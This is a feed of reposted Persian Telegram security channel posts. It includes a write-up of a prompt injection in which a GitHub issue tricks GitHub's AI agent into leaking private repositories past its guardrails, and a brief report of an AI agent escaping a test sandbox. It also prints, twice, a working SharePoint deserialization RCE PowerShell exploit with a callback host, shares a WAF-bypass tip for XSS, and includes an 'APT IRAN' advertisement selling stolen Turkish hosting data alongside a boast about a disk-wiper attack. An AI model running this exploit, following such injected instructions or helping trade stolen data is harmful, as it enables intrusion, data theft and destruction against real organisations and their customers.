Forwarded from هکرنیوز|Hacker News
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from امنیت سایبری | Cyber Security
نشت مخفیانهی دیتا از ریپازیتوریهای پرایوت گیتهاب با یه ترفند سادهی هوش مصنوعی 📚
فکر کنید یه نفر بدون هیچ پسورد و دسترسیای، بتونه کدهای مخفیانهتون رو توی گیتهاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیتهاب!
تیم Noma Labs یه آسیبپذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیتهاب پیدا کرده. داستان از این قراره که این ایجنتها میتونن issueها رو بخونن و اتوماسیون انجام بدن.
حالا هکرها چیکار میتونن بکنن؟
هکر کافیه بیاد تو یکی از ریپازیتوریهای پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه.
ایجنت گیتهاب این متن رو میخونه، گول میخوره و به جای کار اصلیش، میره فایلها و دیتای ریپازیتوریهای پرایوتِ همون سازمان رو میخونه و برای هکر میفرسته!
نکتهی جالب اینجاست:
گیتهاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محققها فهمیدن فقط با اضافه کردن کلمهی "Additionally" (بهعلاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج میشه و به جای اینکه درخواست رو رد کنه، تمام محدودیتها رو دور میزنه و دیتا رو لو میده.
این دقیقاً نشون میده که توی سیستمهای جدید هوش مصنوعی، همون متنی که ایجنت میخونه همزمان میتونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وبسایتها میاورد.
البته این باگ به طور مسئولانه به گیتهاب گزارش شده، ولی حواستون به ایجنتهایی که به سورسکدهاتون دسترسی دارن باشه!
🔗 https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos
✅ Channel
💬 Group
فکر کنید یه نفر بدون هیچ پسورد و دسترسیای، بتونه کدهای مخفیانهتون رو توی گیتهاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیتهاب!
تیم Noma Labs یه آسیبپذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیتهاب پیدا کرده. داستان از این قراره که این ایجنتها میتونن issueها رو بخونن و اتوماسیون انجام بدن.
حالا هکرها چیکار میتونن بکنن؟
هکر کافیه بیاد تو یکی از ریپازیتوریهای پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه.
ایجنت گیتهاب این متن رو میخونه، گول میخوره و به جای کار اصلیش، میره فایلها و دیتای ریپازیتوریهای پرایوتِ همون سازمان رو میخونه و برای هکر میفرسته!
نکتهی جالب اینجاست:
گیتهاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محققها فهمیدن فقط با اضافه کردن کلمهی "Additionally" (بهعلاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج میشه و به جای اینکه درخواست رو رد کنه، تمام محدودیتها رو دور میزنه و دیتا رو لو میده.
این دقیقاً نشون میده که توی سیستمهای جدید هوش مصنوعی، همون متنی که ایجنت میخونه همزمان میتونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وبسایتها میاورد.
البته این باگ به طور مسئولانه به گیتهاب گزارش شده، ولی حواستون به ایجنتهایی که به سورسکدهاتون دسترسی دارن باشه!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1
Forwarded from Security Internals
این کد poc مربوط به rce جدید sharepoint که deserial هست
$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}
https://x.com/testanull/status/2079082982640668990
$n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue}
https://x.com/testanull/status/2079082982640668990
❤1
Forwarded from R0ot
وزارت دادگستری امریکا با همکاری FBI و اداره ملی تحقیقات فنلاند، Peter Stokes، یکی از هکرهای گروه هکری بزرگ Scattered Spider رو با همکاری مایکروسافت دستگیر کردن!
گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته!
یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد.
نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده.
طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته.
شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه.
ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده.
از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده.
در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده.
چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای مایکروسافت میفرسته، کاربران رو بیش از پیش مجاب کرده که حداقل برای کارهای حساسشون فقط از سیستم عاملهای مبتنی بر لینوکس استفاده کنن چون حتی دستگاه های اپل هم کمابیش ایپی کاربر رو به سرورهای این شرکت میفرستن.
@ITSecurityComputer
گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته!
یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد.
نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده.
طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته.
شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه.
ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده.
از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده.
در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده.
چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای مایکروسافت میفرسته، کاربران رو بیش از پیش مجاب کرده که حداقل برای کارهای حساسشون فقط از سیستم عاملهای مبتنی بر لینوکس استفاده کنن چون حتی دستگاه های اپل هم کمابیش ایپی کاربر رو به سرورهای این شرکت میفرستن.
@ITSecurityComputer
❤1👍1
Forwarded from تکنولوژی،خبری،هوش مصنوعی،
یک عامل هوش مصنوعی از کنترل خارج شد
🔹اوپنایآی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدلهای پیشرفته این شرکت از محیط کنترلشده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریفشده، زیرساختهایهاگینگفیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانیها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است.
@ITSecurityComputer
🔹اوپنایآی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدلهای پیشرفته این شرکت از محیط کنترلشده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریفشده، زیرساختهایهاگینگفیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانیها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است.
@ITSecurityComputer
❤3
Forwarded from Security Internals
یه تارگت بود داشتم تست میکردم و نیاز به بایپس waf داشت و این یکی akamai بود
اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید
تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document
داشته باشید به درد میخوره
https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید
تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document
داشته باشید به درد میخوره
https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
cherry-event-b75 on Notion
DOM Clobbering و WAF Bypass | Notion
فلسفه کلیدی: به جای درگیری مستقیم با فایروال (WAF) و استفاده از کاراکترهای عجیب، از رفتارهای استاندارد و ذاتی خود مرورگر استفاده کن تا از مسیرهای پنهان به اهدافت برسی.
❤2👍2
Forwarded from APT IRAN
فروش عمده اطلاعات سرور و مشتریان این هاستینگ :
اطلاعات بیش از 250 وب سایت + اطلاعات مشتریان این وب سایت ها (مردم و شرکت ها)
اطلاعات سرور ها و کانفیگ ها
در مجموع و به طور خلاصه : 5.52GB از کشور ترکیه + شرکای خصوصی و تجازی
قیمت کل دیتابیس به صورت عمده : 7,500$
پرداخت از طریق : BTC
برای خرید با ما در ارتباط باشید :
https://t.me/+525638176691
اطلاعات بیش از 250 وب سایت + اطلاعات مشتریان این وب سایت ها (مردم و شرکت ها)
اطلاعات سرور ها و کانفیگ ها
در مجموع و به طور خلاصه : 5.52GB از کشور ترکیه + شرکای خصوصی و تجازی
قیمت کل دیتابیس به صورت عمده : 7,500$
پرداخت از طریق : BTC
برای خرید با ما در ارتباط باشید :
https://t.me/+525638176691
🔥1😐1
Forwarded from APT IRAN
This media is not supported in your browser
VIEW IN TELEGRAM
Wiper attack on firewall hosted on Yesilbeyaz Hosting (Turkey)
full disk wiper attack was executed with root access, zeroing out the first 1GB of the disk including GPT, bootloader, and ZFS structures.
The server is now completely dead and will never boot again. The entire system and all data are wiped.
full disk wiper attack was executed with root access, zeroing out the first 1GB of the disk including GPT, bootloader, and ZFS structures.
The server is now completely dead and will never boot again. The entire system and all data are wiped.
🔥2😱1😐1